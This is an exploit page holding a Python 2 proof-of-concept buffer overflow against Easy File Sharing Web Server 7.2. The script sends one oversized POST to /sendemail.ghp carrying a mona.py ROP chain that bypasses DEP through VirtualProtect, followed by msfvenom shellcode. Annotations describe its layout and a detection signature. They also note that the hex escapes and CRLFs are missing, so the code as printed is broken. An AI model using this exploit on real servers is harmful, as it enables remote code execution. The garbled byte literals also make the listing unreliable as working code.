Easy File Sharing 7.2 Buffer Overflow
Posted on 19 June 2017
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP)
# Exploit Author: bl4ck h4ck3r
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows XP SP2, Windows 2008 R2 x64
#
# Public proof-of-concept kept for reference.  What the script does, as written:
# it builds one oversized POST to /sendemail.ghp whose Email= parameter carries
# "A" padding, a ROP chain that resolves VirtualProtect() through the sqlite3.dll
# IAT, an msfvenom-encoded payload, "B" padding and a final return address, then
# sends it once and closes the socket without reading a reply.  Python 2 only
# (print statement; str and bytes are conflated in the join/pack below).
#
# Detection view: the observable is a POST to /sendemail.ghp whose Email field is
# several KB long, dominated by runs of "A" and "B", followed by
# "&getPassword=Get+Password".  No fixed version is stated on this page.
#
# NOTE(review): in this copy every "x90"/"x89"... literal lacks the backslash of a
# \x escape, and the request line has no CRLF or header separators.  As printed
# the strings are therefore plain ASCII and the size arithmetic in buf does not
# reflect the intended byte counts; the escapes appear to have been lost when the
# listing was extracted.
import socket
import struct
import sys

if len(sys.argv) < 2:
    print " Usage: " + sys.argv[0] + " <host> "
    exit()

# 0x1002280a : # ADD ESP,1004 # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
# Placed last in buf; per its comment it moves ESP by 0x1004 and returns,
# presumably landing execution in the rop_chain region -- confirm the offsets
# in a debugger before relying on this reading.
ret = struct.pack("<I", 0x1002280a)

# nopsled
# 200 copies of the literal as printed (see the escape note above).
shellcode = "x90"*200

# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
# Encoded payload emitted by the msfvenom line above; alpha_mixed output is
# printable, which is why these literals survive as readable text.
shellcode += "x89xe7xd9xecxd9x77xf4x5dx55x59x49x49"
shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
shellcode += "x39x6cx5ax48x6bx32x55x50x67x70x47x70"
shellcode += "x75x30x6ex69x78x65x65x61x39x50x31x74"
shellcode += "x4cx4bx50x50x46x50x4cx4bx36x32x36x6c"
shellcode += "x6cx4bx66x32x42x34x6cx4bx52x52x77x58"
shellcode += "x54x4fx4cx77x63x7ax31x36x66x51x4bx4f"
shellcode += "x4ex4cx47x4cx73x51x73x4cx76x62x76x4c"
shellcode += "x51x30x59x51x78x4fx46x6dx76x61x48x47"
shellcode += "x6ax42x79x62x50x52x50x57x4cx4bx63x62"
shellcode += "x36x70x4ex6bx30x4ax37x4cx6ex6bx42x6c"
shellcode += "x42x31x33x48x49x73x50x48x33x31x6ax71"
shellcode += "x42x71x4cx4bx63x69x47x50x45x51x4ax73"
shellcode += "x6cx4bx72x69x44x58x6bx53x67x4ax42x69"
shellcode += "x6ex6bx45x64x4cx4bx46x61x6bx66x35x61"
shellcode += "x39x6fx6cx6cx6bx71x58x4fx34x4dx46x61"
shellcode += "x6bx77x44x78x6dx30x71x65x59x66x64x43"
shellcode += "x61x6dx48x78x67x4bx61x6dx74x64x32x55"
shellcode += "x4dx34x42x78x6ex6bx32x78x44x64x56x61"
shellcode += "x68x53x62x46x4ex6bx36x6cx70x4bx4cx4b"
shellcode += "x56x38x35x4cx56x61x59x43x6cx4bx76x64"
shellcode += "x4cx4bx56x61x78x50x6ex69x61x54x37x54"
shellcode += "x55x74x53x6bx63x6bx63x51x32x79x71x4a"
shellcode += "x36x31x69x6fx4bx50x43x6fx31x4fx73x6a"
shellcode += "x6ex6bx36x72x58x6bx4cx4dx53x6dx52x4a"
shellcode += "x47x71x4cx4dx6fx75x48x32x43x30x53x30"
shellcode += "x67x70x32x70x31x78x34x71x4ex6bx32x4f"
shellcode += "x6cx47x39x6fx68x55x4fx4bx4cx30x68x35"
shellcode += "x4fx52x33x66x50x68x79x36x5ax35x6dx6d"
shellcode += "x4dx4dx49x6fx68x55x55x6cx76x66x53x4c"
shellcode += "x75x5ax6bx30x59x6bx59x70x72x55x33x35"
shellcode += "x6fx4bx37x37x76x73x74x32x70x6fx50x6a"
shellcode += "x67x70x50x53x59x6fx69x45x65x33x75x31"
shellcode += "x62x4cx61x73x46x4ex75x35x30x78x72x45"
shellcode += "x45x50x41x41"


def create_rop_chain():
    """Return the mona.py-generated ROP chain as one string of packed little-endian DWORDs.

    Reading the gadget comments: EAX is loaded with -202 and negated, then
    added to EBX (mona could not load 0x201 into EBX directly); the
    VirtualProtect() pointer is read from the sqlite3.dll IAT slot into EAX,
    swapped into EDI and copied into ESI; EBP gets a push esp # ret gadget;
    EDX is zeroed and incremented 64 times (0x40); ECX gets a writable
    location, EDI a ROP NOP, EAX a nop DWORD; PUSHAD # RETN closes the chain.
    Takes no arguments and reads only struct.  ''.join over struct.pack output
    is valid on Python 2 only (str join of bytes raises on Python 3).
    """
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        # 0x00000000,  # [-] Unable to find gadget to put 00000201 into ebx
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0xFFFFFDFE,  # -202
        0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
        0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ}
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x1004de84,  # &Writable location [ImageLoad.dll]
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
        0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
        0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll]
        0x1001d626,  # XOR ESI,ESI # RETN [ImageLoad.dll]
        0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
        0x100218f9,  # POP EBP # RETN [ImageLoad.dll]
        0x61c24169,  # & push esp # ret [sqlite3.dll]
        0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
        # 64 repetitions of the same gadget: EDX counts 0 -> 0x40.  The ADD CL,CL
        # side effect is harmless here because ECX is reloaded by POP ECX below.
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x1001bd98,  # POP ECX # RETN [ImageLoad.dll]
        0x1004de84,  # &Writable location [ImageLoad.dll]
        0x61c373a4,  # POP EDI # RETN [sqlite3.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x90909090,  # nop
        0x100240c2,  # PUSHAD # RETN [ImageLoad.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)


rop_chain = create_rop_chain()

# Layout of the Email= value: 2278 bytes of "A" up to the chain, the chain, the
# payload, "B" filler so that chain + payload + filler is exactly 1794 bytes, and
# finally ret -- so ret always sits at offset 2278 + 1794 from the start of buf.
buf = "A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret

# Single fire-and-forget TCP request to port 80 on the host given in argv[1];
# no response is read.  As printed the request line carries no Content-Length
# header and no CRLF separators (see the escape note in the header).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send("POST /sendemail.ghp HTTP/1.1 Email=" + buf + "&getPassword=Get+Password")
s.close()